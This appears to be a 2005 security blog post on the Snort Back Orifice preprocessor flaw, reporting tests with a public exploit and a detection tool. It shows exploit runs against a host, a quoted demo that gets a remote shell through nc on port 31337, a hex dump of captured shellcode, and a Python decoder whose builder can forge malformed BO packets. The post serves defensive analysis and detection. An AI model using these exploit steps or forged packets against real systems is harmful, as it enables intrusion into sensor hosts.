As I expected, FrSIRT published an exploit for the Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target:
1 | manual testing gcc with -O0
Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target:
2 | manual testing gcc with -O2
Sending exploit to 66.93.110.10
Done.
Here is what the traffic looks like:
09:30:36.134739 IP 192.168.2.5.56292 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
09:30:49.654205 IP 192.168.2.5.55465 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:
* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1
Kyle Haugsness wrote a tool and rules to detect the Snort BO exploit which you might find useful. By following the directions in the code I got it to work on FreeBSD 5.4:
orr:/home/richard$ gcc -Wall -lpcap -o ident-snort-bo-exploit ident-snort-bo-exploit.c
orr:/home/richard$ sudo ./ident-snort-bo-exploit
# Using interface: fxp0
# Using alert output file: stdout
# Using pcap output file: snort-bo-exploit-2005-10-25-09:46:54.cap
#
##############################################
#
# Detected exploit attempt! (details below)
# Note that shellcode should start after 9th
# byte into the payload below (the 8 byte
# magic value has been removed and the
# remainder of the header is 9 bytes).
#
##############################################
#
# Date/time: Tue Oct 25 09:47:21 2005
# Source IP: 192.168.2.5
# Dest IP: 66.93.110.10
# Source port: 64544
# Dest port: 53
# UDP data len: 1400
# BO key (dec): 31337
# BO key (hex): 0x7A69
# BO data len: -18 (UDP len - 17 byte BO header)
# BO pkt id: -1
# BO pkt type: 0x01 (0x01 = PING)
#
# Decrypted BO data:
#
0x0000: FF FF FF FF FF FF FF FF 01 90 90 90 90 90 90 90 ................
0x0010: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0x0020: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
...edited...
0x0550: 3D AA E7 D7 80 CA 0F 07 36 14 2A 0C 65 08 05 8C =.......6.*.e...
0x0560: EE 97 25 0C 0F 90 66 06 2B 5B E2 3C CE E9 14 4B ..%...f.+[.<...K
0x0570: 00 00 00 00 00 00 00 00 ........
#
# Decoded packet num: 1; Exploit: yes; Timestamp: Tue Oct 25 09:47:21 2005
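A defender-side decoder for the header fields that Kyle Haugsness's tool reports above, written as an added example (it is neither his code nor Snort's preprocessor): it recovers the 16-bit key by trying every seed of the Back Orifice keystream generator until the first eight payload bytes decrypt to the `*!*QWTY?` magic, parses the 17-byte header, and flags a length field that disagrees with the datagram, which is what turns the -18 "BO data len" above into an alert condition. The generator constants and the little-endian header layout are those of the Back Orifice protocol; the two sample packets are constructed, and the eight-byte prefix is the start of the UDP payload in the tcpdump output earlier in this post.

```python
import struct

MAGIC = b"*!*QWTY?"      # Back Orifice packet magic (8 bytes)
HDR_LEN = 17             # magic(8) + length(4) + packet id(4) + type(1)
BO_TYPE_PING = 0x01
DEFAULT_KEY = 31337      # key a BO server uses when no password is set

def bo_keystream(seed, n):
    """Back Orifice keystream: MSVC-style LCG, low byte of bits 16..30 per step."""
    r, out = seed & 0xFFFFFFFF, bytearray()
    for _ in range(n):
        r = (r * 214013 + 2531011) & 0xFFFFFFFF
        out.append((r >> 16) & 0xFF)
    return bytes(out)

def bo_crypt(data, key):
    """XOR with the keystream; encryption and decryption are the same operation."""
    return bytes(a ^ b for a, b in zip(data, bo_keystream(key, len(data))))

def bo_find_key(payload):
    """Recover the 16-bit key: the seed whose keystream maps the first 8 bytes to MAGIC."""
    if len(payload) < HDR_LEN:
        return None
    for key in range(1 << 16):
        if bo_crypt(payload[:8], key) == MAGIC:
            return key
    return None

def bo_parse(payload):
    """Decode the BO header of a UDP payload; None if it is not a BO packet."""
    key = bo_find_key(payload)
    if key is None:
        return None
    plain = bo_crypt(payload[:HDR_LEN], key)
    length, pkt_id, ptype = struct.unpack_from("<iiB", plain, 8)  # little-endian fields
    return {"key": key, "length": length, "pkt_id": pkt_id, "type": ptype,
            "data_len": length - HDR_LEN,         # the tool above prints this as "BO data len"
            "length_ok": length == len(payload)}  # mismatch means a malformed header

def bo_build(key, ptype, body, length=None):
    """Constructed test packets only; `length` lets a test forge an inconsistent header."""
    total = HDR_LEN + len(body) if length is None else length
    return bo_crypt(MAGIC + struct.pack("<iiB", total, 1, ptype) + body, key)

# Constructed samples, not captured traffic.
SAMPLE_PING = bo_build(DEFAULT_KEY, BO_TYPE_PING, b"!PING!host!")
SAMPLE_BAD_LEN = bo_build(DEFAULT_KEY, BO_TYPE_PING, b"X" * 64, length=-1)
# First eight UDP payload bytes of the exploit datagram in the post's tcpdump output.
CAPTURED_MAGIC = bytes.fromhex("ce63d1d216e713cf")
```

bo_parse(SAMPLE_BAD_LEN) reports key 31337, type 0x01 and data_len -18 with length_ok False, matching the fields in the tool output above, while bo_parse(SAMPLE_PING) reports length_ok True. bo_crypt(CAPTURED_MAGIC, 31337) yields the magic, confirming that the captured exploit used the default key.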
On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:
"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."
I agree there is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at the direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of the vulnerability from US-CERT and not Neel himself?